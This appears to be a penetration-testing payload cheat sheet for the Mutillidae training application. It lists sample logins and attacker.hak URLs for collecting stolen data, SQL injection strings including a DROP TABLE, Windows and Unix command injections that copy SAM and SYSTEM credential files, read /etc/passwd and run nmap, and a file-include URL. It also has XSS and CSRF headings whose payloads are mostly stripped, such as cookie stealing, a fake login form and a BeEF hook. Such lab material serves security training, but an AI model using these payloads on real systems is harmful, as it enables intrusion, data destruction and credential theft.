Accounts: admin adminpass adrian somepassword john monkey ed pentest http://attacker.hak/mutillidae/caughtdata.txt http://attacker.hak/mutillidae/pwnme.html ----------------------------------------------------------------------------------- ----------------------------------------------------------------------------------- SQL Injection Strings: ' '; DROP TABLE owasp10; -- ' or 1=1 -- ' + password -- Command Injection Strings (Windows): && dir && wmic process list && wmic useraccount list && copy c:\WINDOWS\repair\sam && copy c:\WINDOWS\repair\system.bak && copy C:\Windows\System32\config\RegBack\sam.old && copy C:\Windows\System32\config\RegBack\SYSTEM.OLD Command Injections (for *nix): ;whoami ;cat /etc/passwd ;nmap -A target.hak ----------------------------------------------------------------------------------- ----------------------------------------------------------------------------------- Simple XSS: Page Redirect XSS: Cookie Stealing: Password Con XSS: More complicated, but better looking XSS password form:
You must login to continue
User:
Password:

Clippy XSS:
Hello, it looks like you have an XSS vulnerability, would you like some help fixing that?
External Javascript: Hot BeEF Injection: User Agent Example: ----------------------------------------------------------------------------------- ----------------------------------------------------------------------------------- File includes: at source viewer: http://target.hak/mutillidae/index.php?page=source-viewer.php&php_file_name=config.inc ----------------------------------------------------------------------------------- ----------------------------------------------------------------------------------- CSRF/XSRF Examples: IMG get: IFRAME Get: Post method: The Post: The HTML